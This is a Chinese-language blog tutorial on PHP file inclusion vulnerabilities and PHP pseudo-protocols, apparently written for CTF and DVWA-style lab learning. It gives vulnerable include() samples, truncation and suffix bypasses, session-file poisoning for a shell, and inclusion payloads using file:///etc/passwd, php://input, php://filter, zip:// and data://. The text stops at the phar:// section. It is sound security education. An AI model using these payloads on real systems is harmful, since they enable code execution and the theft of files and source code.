<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言本文主要总结文件包含漏洞和伪协议相关知识。文中部分内容直接或间接引用于其他大牛的文章中，我都会标明出处，如有侵权，请发邮箱联系我删除。多有不合理之处，望大佬指点。  文件包含漏洞文件包含概述服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当做PHP来执行，这会为开发者节省大量的时间。这意味着可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只更新一个包">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含漏洞&amp;伪协议总结">
<meta property="og:url" content="http://example.com/2021/01/02/php3/index.html">
<meta property="og:site_name" content="無限可能">
<meta property="og:description" content="前言本文主要总结文件包含漏洞和伪协议相关知识。文中部分内容直接或间接引用于其他大牛的文章中，我都会标明出处，如有侵权，请发邮箱联系我删除。多有不合理之处，望大佬指点。  文件包含漏洞文件包含概述服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当做PHP来执行，这会为开发者节省大量的时间。这意味着可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只更新一个包">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/1.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/2.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/3.png">
<meta property="article:published_time" content="2021-01-02T06:21:53.000Z">
<meta property="article:modified_time" content="2021-01-23T03:24:38.499Z">
<meta property="article:author" content="jiulin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/1.png">

<link rel="canonical" href="http://example.com/2021/01/02/php3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>文件包含漏洞&伪协议总结 | 無限可能</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">無限可能</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">个人邮箱：985885413@qq.com</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/01/02/php3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="jiulin">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="無限可能">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件包含漏洞&伪协议总结
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-01-02 14:21:53" itemprop="dateCreated datePublished" datetime="2021-01-02T14:21:53+08:00">2021-01-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-01-23 11:24:38" itemprop="dateModified" datetime="2021-01-23T11:24:38+08:00">2021-01-23</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/php/" itemprop="url" rel="index"><span itemprop="name">php</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本文主要总结文件包含漏洞和伪协议相关知识。文中部分内容直接或间接引用于其他大牛的文章中，我都会标明出处，如有侵权，请发邮箱联系我删除。多有不合理之处，望大佬指点。</p>
<hr>
<h1 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h1><h2 id="文件包含概述"><a href="#文件包含概述" class="headerlink" title="文件包含概述"></a>文件包含概述</h2><p>服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当做PHP来执行，这会为开发者节省大量的时间。这意味着可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只更新一个包含文件就可以了，或者当向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。<a id="more"></a></p>
<p>PHP中的文件包含函数有以下四种：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">require()：	找不到被包含的文件时会产生致命错误，并停止脚本运行。</span><br><span class="line"></span><br><span class="line">include()：	找不到被包含的文件时只会产生警告，脚本将继续运行。</span><br><span class="line"></span><br><span class="line">include_once()：	与include()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，确保它只被包括一次以避免函数重定义、变量重新赋值等问题。</span><br><span class="line"></span><br><span class="line">require_once()：	与require()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。</span><br></pre></td></tr></table></figure>



<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致了执行了非预期的代码。</p>
<p>文件包含可以包含任意文件，即便被包含的文件并不是与当前编程语言相关，甚至为图片，只要文件被包含，其内容会被包含文件包含，并以当前服务器脚本语言执行。</p>
<p>各类文件包含的利用方法都是一样的，只是包含文件的位置不同，从而做出了区分。</p>
<p>主要分为<strong>本地文件包含漏洞</strong>和<strong>远程文件包含漏洞</strong>。</p>
<h2 id="本地文件包含漏洞"><a href="#本地文件包含漏洞" class="headerlink" title="本地文件包含漏洞"></a>本地文件包含漏洞</h2><p>当包含的文件在服务器本地时，就形成了本地文件包含。</p>
<p>下面我们来简单做个测试：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $file = $_GET[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>($file);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    <span class="comment">//以上代码中可以控制可控参数file来控制包含的$file的值。</span></span><br></pre></td></tr></table></figure>

<p>因为文件包含可以包含任意文件，所以我们可以建立任意后缀文件进行包含，比如新建一个文件<code>file.txt</code>,文件内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">phpinfo();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后我们包含<code>file.txt</code>文件：</p>
<p><img src="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/1.png"></p>
<p>如果包含的文件内容不符合php语言语法的，会直接将文件内容输出。</p>
<p>像上面这样的漏洞叫做无限制本地文件包含漏洞。如果开发者做了一定的限制，如限制了包含文件的后缀，如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $file = $_GET[<span class="string">&#x27;file&#x27;</span>] . <span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> $file;</span><br><span class="line">    <span class="keyword">include</span>($file);</span><br></pre></td></tr></table></figure>

<p>这样的话，我们的<code>file.txt</code>就会被识别为<code>file.txt.php</code>，从而无法找到要包含的文件。</p>
<p>像这样的有限制本地文件包含漏洞，我们可以通过<code>%00</code>截断、路径长度截断等方法来绕过。</p>
<h3 id="00截断"><a href="#00截断" class="headerlink" title="%00截断"></a><code>%00</code>截断</h3><p>方法：在文件名结尾加<code>%00</code> 。</p>
<p>条件：PHP版本小于<code>5.3</code>、<code>php.ini</code>文件中<code>magic_quotes_gpc = off</code>、对可控参数并未使用<code>addslashes</code>函数。</p>
<h3 id="路径长度截断"><a href="#路径长度截断" class="headerlink" title="路径长度截断"></a>路径长度截断</h3><p>方法：文件结尾加/./././././././来超出长度。</p>
<p>条件：在 windows OS 中点号需要长于256；linux OS 中要长于4096。</p>
<blockquote>
<p>Windows下目录最大长度为256字节，超出的部分会被丢弃；</p>
<p>Linux下目录最大长度为4096字节，超出的部分会被丢弃。</p>
</blockquote>
<h3 id="点号截断"><a href="#点号截断" class="headerlink" title="点号截断"></a>点号截断</h3><p>方法：文件结尾加点号。</p>
<p>条件：在 windows OS 中点号需要长于256。</p>
<h2 id="session文件包含漏洞"><a href="#session文件包含漏洞" class="headerlink" title="session文件包含漏洞"></a>session文件包含漏洞</h2><blockquote>
<p>引自Freebuf：<a target="_blank" rel="noopener" href="https://www.freebuf.com/news/182280.html">《Web安全实战系列：文件包含漏洞》</a></p>
</blockquote>
<p>由于我们可以通过<code>phpinfo</code>的信息来获取到session的存储位置，当其中的内容可控时，我们就可以将恶意代码存储到该目录下，从而getshell。</p>
<p>通过phpinfo的信息，获取到session.save_path为/var/lib/php/session：</p>
<p><img src="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/2.png"></p>
<p>示例代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">session_start();</span><br><span class="line">$ctfs=$_GET[<span class="string">&#x27;ctfs&#x27;</span>];</span><br><span class="line">$_SESSION[<span class="string">&quot;username&quot;</span>]=$ctfs;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>上述php会将获取到的GET型ctfs变量的值存入到session中。</p>
<p>当访问<a target="_blank" rel="noopener" href="http://www.ctfs-wiki/session.php?ctfs=ctfs">http://www.ctfs-wiki/session.php?ctfs=ctfs</a> 后，会在/var/lib/php/session目录下存储session的值。</p>
<p>session的文件名为sess_+session id，session id可以通过开发者模式获取。</p>
<p>获取后拼接session的文件名为<code>sess_akp79gfiedh13ho11i6f3sm6s6</code>。</p>
<p>到服务器的/var/lib/php/session目录下查看果然存在此文件，内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">username|s:4:&quot;ctfs&quot;;</span><br><span class="line">[root@c21336db44d2 session]# cat sess_akp79gfiedh13ho11i6f3sm6s6</span><br><span class="line">username|s:4:&quot;ctfs&quot;</span><br></pre></td></tr></table></figure>



<p>通过上面的分析，我们可以知道ctfs传入的值会存储到session文件中，如果存在本地文件包含漏洞，就可以通过ctfs写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码getshell。</p>
<p>当访问<a target="_blank" rel="noopener" href="http://www.ctfs-wiki/session.php?ctfs=">http://www.ctfs-wiki/session.php?ctfs=</a>&lt;?php phpinfo() ;? &gt;后，会在/var/lib/php/session目录下存储session的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1a</span><br><span class="line">username|s:18:&quot;&lt;?php phpinfo();?&gt;&quot;;</span><br></pre></td></tr></table></figure>

<p>攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置，文件名称通过开发者模式可获取到，然后通过文件包含的漏洞解析恶意代码getshell。</p>
<h2 id="远程文件包含漏洞"><a href="#远程文件包含漏洞" class="headerlink" title="远程文件包含漏洞"></a>远程文件包含漏洞</h2><p>当包含的文件在远程服务器上时，就形成了远程文件包含。</p>
<p>远程包含需要<code>php.ini</code>中<code>allow_url_include = on</code>以及<code>allow_url_fopen=on</code>，且所包含远程服务器的文件后缀不能与目标服务器语言相同。(比如目标服务器是php脚本语言解析的，那么包含的远程服务器文件后缀不能是<code>php</code>)，否则我们将得到远程服务器的信息，而非目标服务器。</p>
<p>所以我们在利用远程包含文件漏洞时，不能用<code>.php</code>后缀的文件，就要把<code>.php</code>改为<code>.txt</code>一类的后缀来包含。</p>
<p>当开发者对远程文件包含进行了后缀名限制时，我们也有很多绕过方法。</p>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $file = $_GET[<span class="string">&#x27;file&#x27;</span>] . <span class="string">&#x27;.html&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> $file;</span><br><span class="line">    <span class="keyword">include</span>($file);</span><br></pre></td></tr></table></figure>



<h3 id="问号绕过"><a href="#问号绕过" class="headerlink" title="问号绕过"></a>问号绕过</h3><p>方法：结尾加问号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;1.php?filename&#x3D;http:&#x2F;&#x2F;192.168.91.133&#x2F;FI&#x2F;php.txt?</span><br></pre></td></tr></table></figure>



<h3 id="井号绕过"><a href="#井号绕过" class="headerlink" title="井号绕过"></a>井号绕过</h3><p>方法：结尾加<code>#</code>（url中为<code>%23</code>）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;1.php?filename&#x3D;http:&#x2F;&#x2F;192.168.91.133&#x2F;FI&#x2F;php.txt%23</span><br></pre></td></tr></table></figure>



<p>空格绕过</p>
<p>方法：结尾加空格（url中为<code>%3f</code>）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;1.php?filename&#x3D;http:&#x2F;&#x2F;192.168.91.133&#x2F;FI&#x2F;php.txt%3f</span><br></pre></td></tr></table></figure>



<hr>
<h1 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h1><p>PHP伪协议事实上就是支持的协议与封装协议，共十二种。</p>
<p><img src="https://cdn.jsdelivr.net/gh/jiulin23/image@2.2.3/php/phpinclude/3.png"></p>
<p>伪协议常常用于文件包含漏洞之中。</p>
<p>以下总结部分常用的伪协议。</p>
<h2 id="file"><a href="#file" class="headerlink" title="file://"></a>file://</h2><p>用于访问本地文件系统的文件。</p>
<p>条件：<code>allow_url_fopen: off/on</code> 、<code>allow_url_include: off/on</code></p>
<p>用法及示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Linux：http:&#x2F;&#x2F;127.0.0.1&#x2F;FI&#x2F;LFI.php?file&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd		绝对路径</span><br><span class="line">Windows	：http:&#x2F;&#x2F;192.168.6.128:8001&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;file:&#x2F;&#x2F;C:\DVWA-master\vulnerabilities\fi\1.txt  绝对路径</span><br></pre></td></tr></table></figure>



<h2 id="php"><a href="#php" class="headerlink" title="php://"></a>php://</h2><table>
<thead>
<tr>
<th>协议</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>php://input</td>
<td>可以访问请求的原始数据的只读流，在POST请求中访问POST的<code>data</code>部分，在<code>enctype=&quot;multipart/form-data&quot;</code> 的时候<code>php://input </code>是无效的。</td>
</tr>
<tr>
<td>php://output</td>
<td>只写的数据流，允许以 print 和 echo 一样的方式写入到输出缓冲区。</td>
</tr>
<tr>
<td>php://fd</td>
<td>(&gt;=5.3.6)允许直接访问指定的文件描述符。例如 <code>php://fd/3</code> 引用了文件描述符 3。</td>
</tr>
<tr>
<td>php://memory php://temp</td>
<td>(&gt;=5.1.0)一个类似文件包装器的数据流，允许读写临时数据。两者的唯一区别是 <code>php://memory</code> 总是把数据储存在内存中，而 <code>php://temp</code> 会在内存量达到预定义的限制后（默认是 <code>2MB</code>）存入临时文件中。临时文件位置的决定和 <code>sys_get_temp_dir()</code> 的方式一致。</td>
</tr>
<tr>
<td>php://filter</td>
<td>(&gt;=5.0.0)一种元封装器，设计用于数据流打开时的筛选过滤应用。对于一体式<code>（all-in-one）</code>的文件函数非常有用，类似 <code>readfile()</code>、<code>file()</code> 和 <code>file_get_contents()</code>，在数据流内容读取之前没有机会应用其他过滤器。</td>
</tr>
</tbody></table>
<p>其中最常用的是<code>php://filter </code>和 <code>php://input</code>。</p>
<h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><p>将POST输入流当做PHP代码执行。</p>
<p>条件：<code>allow_url_include：on</code> 、<code>allow_url_fopen：on/off</code></p>
<p>用法：将要执行的php代码直接在post中提交。</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.6.128:8001&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;php:&#x2F;&#x2F;input</span><br><span class="line">	POST数据：&lt;?php echo &#39;test&#39;; ?&gt;</span><br></pre></td></tr></table></figure>



<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><p>可以作为一个中间流来处理其他流，可进行任意文件的读取，一般用于读取php的源代码。</p>
<p>条件：<code>allow_url_fopen: off/on</code>  、<code>allow_url_include: off/on</code></p>
<p>用法：</p>
<table>
<thead>
<tr>
<th align="left">名称</th>
<th align="left">描述</th>
<th align="left">备注</th>
</tr>
</thead>
<tbody><tr>
<td align="left">resource=&lt;要过滤的数据流&gt;</td>
<td align="left">指定了你要筛选过滤的数据流。</td>
<td align="left">必选</td>
</tr>
<tr>
<td align="left">read=&lt;读链的筛选列表&gt;</td>
<td align="left">可以设定一个或多个过滤器名称，以管道符（|）分隔。</td>
<td align="left">可选</td>
</tr>
<tr>
<td align="left">write=&lt;写链的筛选列表&gt;</td>
<td align="left">可以设定一个或多个过滤器名称，以管道符（|）分隔。</td>
<td align="left">可选</td>
</tr>
<tr>
<td align="left">&lt;；两个链的筛选列表&gt;</td>
<td align="left">任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。</td>
<td align="left"></td>
</tr>
</tbody></table>
<p>参数见下：</p>
<table>
<thead>
<tr>
<th align="left">字符串过滤器</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left">string.rot13</td>
<td>等同于<code>str_rot13()</code>，rot13变换</td>
</tr>
<tr>
<td align="left">string.toupper</td>
<td>等同于<code>strtoupper()</code>，转大写字母</td>
</tr>
<tr>
<td align="left">string.tolower</td>
<td>等同于<code>strtolower()</code>，转小写字母</td>
</tr>
<tr>
<td align="left">string.strip_tags</td>
<td>等同于<code>strip_tags()</code>，去除html、PHP语言标签</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>转换过滤器</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>convert.base64-encode &amp; convert.base64-decode</td>
<td>等同于<code>base64_encode()</code>和<code>base64_decode()</code>，base64编码解码</td>
</tr>
<tr>
<td>convert.quoted-printable-encode &amp; convert.quoted-printable-decode</td>
<td>quoted-printable 字符串与 8-bit 字符串编码解码</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>压缩过滤器</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>zlib.deflate &amp; zlib.inflate</td>
<td>在本地文件系统中创建 gzip 兼容文件的方法，但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。</td>
</tr>
<tr>
<td>bzip2.compress &amp; bzip2.decompress</td>
<td>同上，在本地文件系统中创建 bz2 兼容文件的方法。</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>加密过滤器</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>mcrypt.*</td>
<td>libmcrypt 对称加密算法</td>
</tr>
<tr>
<td>mdecrypt.*</td>
<td>libmcrypt 对称解密算法</td>
</tr>
</tbody></table>
<p>示例：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">?page=php://filter/read=string.toupper/resource=http://www.example.com</span><br><span class="line">	read=读取形式 这里的string.toupper 是将读出来的字符串大写形式呈现 resource 接对象</span><br><span class="line"></span><br><span class="line">http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php</span><br><span class="line">	php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码（针对php文件需要base64编码）</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="zlib-amp-zip-amp-bzip2"><a href="#zlib-amp-zip-amp-bzip2" class="headerlink" title="zlib:// &amp; zip:// &amp; bzip2://"></a>zlib:// &amp; zip:// &amp; bzip2://</h2><p>均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀：<code>jpg png gif xxx</code> 等等。</p>
<p>条件：<code>allow_url_fopen: off/on</code>  、 <code>allow_url_include: off/on</code></p>
<p>用法及示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;compress.zlib:&#x2F;&#x2F;E:\phpStudy\PHPTutorial\WWW\phpinfo.gz</span><br><span class="line">	compress.zlib:&#x2F;&#x2F;file.gz</span><br><span class="line">	压缩 phpinfo.txt 为 phpinfo.gz 并上传（同样支持任意后缀名）</span><br><span class="line">	</span><br><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;zip:&#x2F;&#x2F;E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt</span><br><span class="line">	zip:&#x2F;&#x2F;[压缩文件绝对路径]%23[压缩文件内的子文件名]（#编码为%23）</span><br><span class="line">	压缩 phpinfo.txt 为 phpinfo.zip ，压缩包重命名为 phpinfo.jpg ，并上传</span><br><span class="line">	</span><br><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;compress.bzip2:&#x2F;&#x2F;E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2</span><br><span class="line">	compress.bzip2:&#x2F;&#x2F;file.bz2</span><br><span class="line">	压缩 phpinfo.txt 为 phpinfo.bz2 并上传（同样支持任意后缀名）</span><br></pre></td></tr></table></figure>



<h2 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h2><p>自<code>PHP&gt;=5.2.0</code>起，可以使用<code>data://</code>数据流封装器，以传递相应格式的数据。通常可以用来执行PHP代码。</p>
<p>条件：<code>allow_url_fopen：on</code> 、 <code>allow_url_include：on</code></p>
<p>用法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">data:&#x2F;&#x2F;text&#x2F;plain,</span><br><span class="line">data:&#x2F;&#x2F;text&#x2F;plain;base64, </span><br></pre></td></tr></table></figure>

<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php%20phpinfo();?&gt;</span><br><span class="line">	data:&#x2F;&#x2F;text&#x2F;plain,</span><br><span class="line">	</span><br><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span><br><span class="line">	data:&#x2F;&#x2F;text&#x2F;plain;base64,</span><br></pre></td></tr></table></figure>



<h2 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h2><p><code>phar://</code>协议与<code>zip://</code>类似，同样可以访问zip格式压缩包内容。</p>
<p>示例：</p>
